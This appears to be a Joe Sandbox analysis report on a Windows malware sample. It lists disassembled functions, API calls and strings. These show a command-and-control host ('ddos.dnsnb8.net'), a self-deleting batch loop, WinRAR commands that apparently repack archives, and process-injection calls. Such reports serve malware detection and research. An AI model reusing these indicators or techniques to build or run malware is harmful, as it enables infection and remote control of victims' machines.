String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SeDebugPrivilege
API String ID: 4123949106-3534422503
Opcode ID: 1a7e82e70b3c3942a36418f3ea4a553cc2aea81f2e2544bca0b32769bdbe11f3
Instruction ID: 3140082f6acefb7fa272cf8c1ebf6835902875562a79ff74ffd06f1ad6725585
Opcode Fuzzy Hash: 1a7e82e70b3c3942a36418f3ea4a553cc2aea81f2e2544bca0b32769bdbe11f3
Instruction Fuzzy Hash: 1E314271D04209AAEF609FAD8C45FEEBBF9EB4A704F1044AAE505B2141DA309E45CF60

Function 00BA6D00 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 2b6a194041663f874a9a2b79956d05d56d0fcceb3f05418225b3322e3f34fd9d
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 178182B1208B418FC728CF29C8906AAB7E2EFD6314F18C96DD4EAC7751D734A949CB54

Function 00BA239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00BA23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00BA2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00BA24A8
memset.MSVCRT ref: 00BA24B9
strrchr.MSVCRT ref: 00BA24C9
wsprintfA.USER32 ref: 00BA24DE
strrchr.MSVCRT ref: 00BA24ED
memset.MSVCRT ref: 00BA24F2
memset.MSVCRT ref: 00BA2505
wsprintfA.USER32 ref: 00BA2524
Sleep.KERNEL32(000007D0), ref: 00BA2535
Sleep.KERNEL32(000007D0), ref: 00BA255D
memset.MSVCRT ref: 00BA256E
wsprintfA.USER32 ref: 00BA2585
memset.MSVCRT ref: 00BA25A6
wsprintfA.USER32 ref: 00BA25CA
Sleep.KERNEL32(000007D0), ref: 00BA25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00BA25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00BA2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00BA2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00BA265B
SetEndOfFile.KERNEL32 ref: 00BA266D
CloseHandle.KERNEL32(00000000), ref: 00BA2676
RemoveDirectoryA.KERNEL32(?), ref: 00BA2681

Strings

%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00BA25C4
%s\, xrefs: 00BA257F
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA23B1, 00BA23B6, 00BA24CD
%s X -ibck "%s" "%s\", xrefs: 00BA251E
%s%s, xrefs: 00BA24D8
-ibck, xrefs: 00BA25BA

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2180922006
Opcode ID: ad39cc514dbf1bca99bf22b9897374b5e67f65af7877b4c2c38c90e18f76aaf2
Instruction ID: 941bcaf0ddf326dc7e7014a57c2b83e7b6cc0d4278569f3be620369315d155e5
Opcode Fuzzy Hash: ad39cc514dbf1bca99bf22b9897374b5e67f65af7877b4c2c38c90e18f76aaf2
Instruction Fuzzy Hash: 1381B271508304BBD7209F68DC85FABB7ECEB8AB14F00055AFA45D31A0DB74DA498B66

Function 00BA274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00BA2766
memset.MSVCRT ref: 00BA2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00BA2787
wsprintfA.USER32 ref: 00BA27AB

Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894

wsprintfA.USER32 ref: 00BA27C6
CopyFileA.KERNEL32(?,00BA4C80,00000000), ref: 00BA27D4
wsprintfA.USER32 ref: 00BA27F4

Part of subcall function 00BA1973: PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
Part of subcall function 00BA1973: CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
Part of subcall function 00BA1973: Sleep.KERNEL32(00000064), ref: 00BA19C6
Part of subcall function 00BA1973: wsprintfA.USER32 ref: 00BA19EC
Part of subcall function 00BA1973: CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
Part of subcall function 00BA1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
Part of subcall function 00BA1973: GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
Part of subcall function 00BA1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
Part of subcall function 00BA1973: ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65

DeleteFileA.KERNEL32(?,?,00BA4E54,00BA4E58), ref: 00BA281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00BA4E54,00BA4E58), ref: 00BA2832

Strings

%s%.8x.exe, xrefs: 00BA27BB
\WinRAR\Rar.exe, xrefs: 00BA2793
c_31892.nls, xrefs: 00BA27DE
C:\Windows\system32, xrefs: 00BA27E3
%s\%s, xrefs: 00BA27EE
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA27B6
%s%s, xrefs: 00BA27A5

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3256556265
Opcode ID: 5e5ea4aac93ec186852458de47cb7b7e3efbc45d16cb886f6731c469f80241ae
Instruction ID: 7c1eaf711e2a999588b253dcd1355b94fb2a9406c9b7e8bae55bb9630757531c
Opcode Fuzzy Hash: 5e5ea4aac93ec186852458de47cb7b7e3efbc45d16cb886f6731c469f80241ae
Instruction Fuzzy Hash: A02150B694431C7BDB10E7A49C8AFDB73ECEB46B54F0005E1B644E3051E7B49F448AA0

Function 00BA1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894

wsprintfA.USER32 ref: 00BA15AA
wsprintfA.USER32 ref: 00BA15C6
lstrlen.KERNEL32(?), ref: 00BA15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00BA15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00BA1609
CloseHandle.KERNEL32(00000000), ref: 00BA1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00BA162D

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA158A, 00BA15B3, 00BA15B8, 00BA15B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00BA15C0
%s%.8x.bat, xrefs: 00BA15A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA1599
open, xrefs: 00BA1627

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$open
API String ID: 617340118-460878772
Opcode ID: 6f121ce5aaa5ca1e13584b45b4aaba1f9ee79670bd0c10b3551d20d863f9e666
Instruction ID: a3aaf969bff9112e615b2abbb623bc753eaec2ea07016dddee381331418fa5c5
Opcode Fuzzy Hash: 6f121ce5aaa5ca1e13584b45b4aaba1f9ee79670bd0c10b3551d20d863f9e666
Instruction Fuzzy Hash: 3D115176A051287AD76097A49C8AEEB7AECDF5BB60F000491F549E3050EA749B84CBB0

Function 00BA120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00BA1400), ref: 00BA1226
GetProcAddress.KERNEL32(00000000), ref: 00BA122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00BA1400), ref: 00BA123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00BA1400), ref: 00BA1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00BA1400), ref: 00BA130A

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA1262
ZwQuerySystemInformation, xrefs: 00BA1212
ntdll.dll, xrefs: 00BA1219

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3489788173
Opcode ID: 86e85546db5ab95673dbe983190f7a98011a9bae9a64e4cabbf03fae05ba3ac6
Instruction ID: e73634bcd6974af16dfb014dbc0486fb0ee7d7876b4f5f949e64da2564fc7679
Opcode Fuzzy Hash: 86e85546db5ab95673dbe983190f7a98011a9bae9a64e4cabbf03fae05ba3ac6
Instruction Fuzzy Hash: FC21F071609311ABD7609F68CC09B6BBAE8FB87F00F000D69F645E7280CB70DA84C7A5

Function 00BA185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
srand.MSVCRT ref: 00BA1878
rand.MSVCRT ref: 00BA1880
srand.MSVCRT ref: 00BA1890
rand.MSVCRT ref: 00BA1894

Strings

http://%s:%d/%s/%s, xrefs: 00BA1860
ddos.dnsnb8.net, xrefs: 00BA1862

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 7104d0494818d2fe643de129b7d3ca2b5adc422b1115628e4ab15ef8511bb4b0
Instruction ID: bac8a395bd2223f2a738c2477e8f14f76b72a6d370c0bbbe64d1a1eeaa80f47a
Opcode Fuzzy Hash: 7104d0494818d2fe643de129b7d3ca2b5adc422b1115628e4ab15ef8511bb4b0
Instruction Fuzzy Hash: FAE0D877A00218BBD710A7F9EC47D9EBBECDE85561B110527F600D3250E971FD448AB4

Function 00BA2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00BA29DB,?,00000001), ref: 00BA26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00BA29DB,?,00000001), ref: 00BA26B5
lstrlen.KERNEL32(?), ref: 00BA26C4
??2@YAPAXI@Z.MSVCRT ref: 00BA26CE
lstrcpy.KERNEL32(00000004,?), ref: 00BA26E3
lstrcpy.KERNEL32(?,00000004), ref: 00BA271F
??3@YAXPAX@Z.MSVCRT ref: 00BA272D
SetEvent.KERNEL32 ref: 00BA273C

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 38f89845555c739da2b24524c93e5aab05116549c75dcbc269bd6cb267439962
Instruction ID: 6c4eb35f9d81bc699fed8557deebddfefc370411cc0e2822da67ab1a8b9aaf7c
Opcode Fuzzy Hash: 38f89845555c739da2b24524c93e5aab05116549c75dcbc269bd6cb267439962
Instruction Fuzzy Hash: EB11BF36508200EFCB319F18EC4A96A7BE9FBC7B207204066F85987120DBB18E85CB50

Function 00BA1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00BA1BCD
rand.MSVCRT ref: 00BA1BD8
memset.MSVCRT ref: 00BA1C43
memcpy.MSVCRT ref: 00BA1C4F
lstrcat.KERNEL32(?,.exe), ref: 00BA1C5D

Strings

vHtzzRrcVJDOYsLdyrSqoKaOhCSkgmFRWpiXIxyqMnggEfXaUUFABiCAICwWENtJkjlATYudZGcxSHDqIXpjlKbPZtnQOmsUvYNoiGQbKyPBrLlzEHhBoTuMcfhaNjePVfLFsZWwJnmpVdRkDbwMxvTGeQeu, xrefs: 00BA1B8A, 00BA1B9C, 00BA1C15, 00BA1C49
.exe, xrefs: 00BA1C57

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$vHtzzRrcVJDOYsLdyrSqoKaOhCSkgmFRWpiXIxyqMnggEfXaUUFABiCAICwWENtJkjlATYudZGcxSHDqIXpjlKbPZtnQOmsUvYNoiGQbKyPBrLlzEHhBoTuMcfhaNjePVfLFsZWwJnmpVdRkDbwMxvTGeQeu
API String ID: 122620767-2897188146
Opcode ID: 08f1a6ff49ffe35edb1fd63bb192779cc55911c40957097779dc0ab460df4c54
Instruction ID: d6497455f07d102a922026aa787c88b6661101e0def96a2e06dae5b52ad8a1d3
Opcode Fuzzy Hash: 08f1a6ff49ffe35edb1fd63bb192779cc55911c40957097779dc0ab460df4c54
Instruction Fuzzy Hash: A0213B32E4C2906ED265133D6C42BA97FC4CFE7B21F1644F9F9C52B1A2E6A40D898264

Function 00BA189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00BA18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00BA18D3
CloseHandle.KERNEL32(00BA2549), ref: 00BA18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA18F0
GetExitCodeProcess.KERNEL32(?,00BA2549), ref: 00BA1901
CloseHandle.KERNEL32(?), ref: 00BA190A

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 5340d9219e92517a10df81b7133fdc8ae94ee07acfd2e64961046259db8f0860
Instruction ID: 59b474cd3ce32fe7e508990b95f000b331d43a7fb575ea8c81f90e33fa6eaefa
Opcode Fuzzy Hash: 5340d9219e92517a10df81b7133fdc8ae94ee07acfd2e64961046259db8f0860
Instruction Fuzzy Hash: B6017172901128BBCB216B95DC49EDF7FBDEF86770F104021F915A61A0D6354A18CAA0

Function 00BA1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00BA1334
GetProcAddress.KERNEL32(00000000), ref: 00BA133B
memset.MSVCRT ref: 00BA1359

Strings

NtSystemDebugControl, xrefs: 00BA132A
ntdll.dll, xrefs: 00BA132F

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 0d16c59259072f396176af302501a672d28813ab18c068670237ea1d310acb5f
Instruction ID: ef6c76f412e5d867c45fbd3cda7b4d301482999db699af4d0f98118116a448cc
Opcode Fuzzy Hash: 0d16c59259072f396176af302501a672d28813ab18c068670237ea1d310acb5f
Instruction Fuzzy Hash: DE018071604309BFDF10DF98EC86A6FBBE8FB42714F0045AAF941A2150E7B08655CB55

Function 00BA1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00BA1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00BA1E1C
strrchr.MSVCRT ref: 00BA1E2B
lstrcmpiA.KERNEL32(?,00BA4488), ref: 00BA1E48
lstrlen.KERNEL32(00BA4488), ref: 00BA1E53

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 0f686fea38795462bc249f992cf8f516ceec48a15fbd092ac55fa442ad67d022
Instruction ID: bfc016e87071d351fb399630f8f0f44ba4b2bc1d78f5a1cbedd43adc8599501f
Opcode Fuzzy Hash: 0f686fea38795462bc249f992cf8f516ceec48a15fbd092ac55fa442ad67d022
Instruction Fuzzy Hash: 9801F9B39082196FEB205764EC49FD777DCDB07350F0404A6EA45E3090EFB49E848BA0

Function 00BA6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BA603C
GetProcAddress.KERNEL32(00000000,00BA6064), ref: 00BA604F

Strings

kernel32.dll, xrefs: 00BA603B

Memory Dump Source

Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 487a8e016df83d3c1187aa195c34e30967c3483ad5919184e6f3424a306f6312
Instruction ID: d19c272769a308f50cec8b47bfc98727ddd6e5afe4befe6235fee2d9cc782acf
Opcode Fuzzy Hash: 487a8e016df83d3c1187aa195c34e30967c3483ad5919184e6f3424a306f6312
Instruction Fuzzy Hash: 02F0F6F11482899FDF70CE68CC84BDE3BE4EB06700F50446AE909CB281DB3886458B14

Analysis Process: ftejcedPID: 1240, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	28.1%
Signature Coverage:	0%
Total number of Nodes:	171
Total number of Limit Nodes:	10

Executed Functions

Function 004C5044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004C5223
WriteFile.KERNELBASE(00000000,FFF3C42A,00003E00,?,00000000), ref: 004C5252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004C5256
WinExec.KERNEL32(?,00000005), ref: 004C5262

Strings

Writ, xrefs: 004C5148
GetT, xrefs: 004C5188
lstr, xrefs: 004C51A7
odul, xrefs: 004C522D
IXDaI.exe, xrefs: 004C51FD, 004C5200
Clos, xrefs: 004C5129
WinE, xrefs: 004C5110
catA, xrefs: 004C51AF
.dll, xrefs: 004C5102
Kern, xrefs: 004C50F4
dleA, xrefs: 004C50D0
Crea, xrefs: 004C5169
GetM, xrefs: 004C50B6
athA, xrefs: 004C5199
el32, xrefs: 004C50FB

Memory Dump Source

Source File: 00000010.00000002.1780099665.00000000004C5000.00000040.00000001.01000000.00000009.sdmp, Offset: 004C5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c5000_ftejced.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$IXDaI.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-2954602755
Opcode ID: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
Instruction ID: 076991852e8da1fcb0d4b364c6bdcc5c790ac0df1960d3426473c1dba4c35b1e
Opcode Fuzzy Hash: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
Instruction Fuzzy Hash: DA61F878D016159BCF648F94C888FAEB7B4BB44315F5982AFD405A6301CB78AAC1CB99

Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

